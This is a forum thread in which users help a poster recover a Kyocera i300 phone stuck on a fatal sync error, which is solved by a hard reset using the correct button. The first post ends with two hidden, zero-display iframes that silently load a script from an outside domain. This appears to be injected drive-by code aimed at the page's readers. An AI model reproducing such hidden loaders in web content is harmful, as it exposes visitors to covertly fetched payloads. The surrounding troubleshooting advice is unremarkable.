+ Reply to Thread
Results 1 to 12 of 12
  1. #1
    Registered User
    Join Date
    11-19-2001
    Posts
    28

    Angry Help! Fatal Error! Won't Reset!!!

    When sync-ing to load a new app (Quick Memo), my i300 crashed with the following message:

    Fatal Alert
    DataMgr.c, Line:5964
    Invalid uniqueID passed

    I've tried numerous SOFT and HARD resets, but I come right back to the same screen/message. Any suggestions???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    10-26-2001
    Location
    Washington, DC
    Posts
    219
    The hard reset has to work. Are you doing it correctly? Do you get a screen that says "Erase Everything -- Up for yes, anything else for no?" Do you then press the up arrow? That erases everything in your unit and brings you back to the digitizer/opening sequence. If that doesn't work, then your unit is busted... but the odds are 1000000 to 1 this is a software issue the hard reset will cure.

  3. #3
    Registered User
    Join Date
    11-19-2001
    Posts
    28

    Unhappy Hard Reset Does Not Work

    Thanks for the scoop, but I'm still dead in the water. The hard reset behaves exactly as you describe ... BUT ... when I press the up arrow at the "erase all data" prompt, the set goes right back to the fatal alert screen.

    I'm going to try to drain the battery to see if that will help.

  4. #4
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    you dont have to drain the battery.. just take the main battery out and the internal batt will die in about 31 hours...

    but i have a question...

    you MAY be doing a WARM reset instead of a cold reset. a cold reset invloves pressing the phone power icon and the reset pin.. take the reset pin out but still keep ythe phone power button pressed.. then release it. then you will see the "erase..." screen. if you do a cold reset correctly you WILL brint the phone back to factory stats.. it seems hard to believe that you have screwed up the phone by a simple hotsync of an app.

    also, if you resync your phone you will load the old prefs onto it and you could be right back at square one...

    hope i didnt offend you, but i just wanted to make sure we are all on the same page.

    all the best!

  5. #5
    Registered User
    Join Date
    11-19-2001
    Posts
    28

    Buttons hosed

    It seems the buttons have somehow been disabled. It doesn't matter which button I continue hold down during the reset; as soon as I remove the pin, the phone attempts to reset (and goes right back to the fatal alert screen).

    This POS is going back to Sprint!

    Thanks for your assistance in troubleshooting.

  6. #6
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    fg...

    dont give up yet!! if the buttons are not responding, then take the batery out and let it drain for a couple of days... yes you wil be withuot this wonderful piece of technology, but you wont have to endure the headache with sprint.

  7. #7
    Registered User
    Join Date
    10-26-2001
    Location
    Washington, DC
    Posts
    219
    Shot in the dark that may solve this problem: Which up arrow are you using? You should be using the one on the front face of the phone, not the one on the side. Any chance that's your problem? If you do the hard reset correctly, I'd be amazed if you were still having Fatal Error problems.

  8. #8
    Registered User
    Join Date
    11-19-2001
    Posts
    28

    I am an idiot!

    masonuc:

    You're the man (or gal)!. I WAS using the wrong button. I'm back online now ... just need to load a ton of programs and resync. Many thanks

  9. #9
    Registered User
    Join Date
    10-26-2001
    Location
    Washington, DC
    Posts
    219
    Man... no problem. Happy to help.

  10. #10
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    glad your back in bizz! i knew a hard reset would solve your problems.. especially with a bad app. i should have made it clear to use the "Palm up button"... sorry...

    mas, you r da man!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    fg,

    make sure youre useing the palm desktop 4.0.1!!

  11. #11
    Registered User
    Join Date
    11-19-2001
    Posts
    28

    Quick Question...

    I'm using the Palm desktop that came with the phone ... I think it's 3.xxxx. How come 4.01? Why do you suppose Sprint did not make it available if it, in fact, offers some improvement?

    Many thanks again - Fred

  12. #12
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    fgkay, the palm desktop 4.0.1 wil save all of your 3rd party apps and voice speedi dial #'s. in regards to the speed dial and voice #'s, other on here who use the palm 4.0.1 and did a cold reset said they could not get it back onto the phone.. BUT i have not done a cold reset to test this for sure.. i KNOW it did work on my kyo 6035 when i flashed the phone to 3.5.2, which involved a cold reset, and ALL was put back on there...

    when the kyo 6035 came out the 4.0.1 was availabe then, but i guess it was not available when sprint mass produced the cd roms.. but not sure..

    anyway, its tons better. it will save all of your 3rd party apps, so no need for BB or having to put them on one at a time...

    go grab it!!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts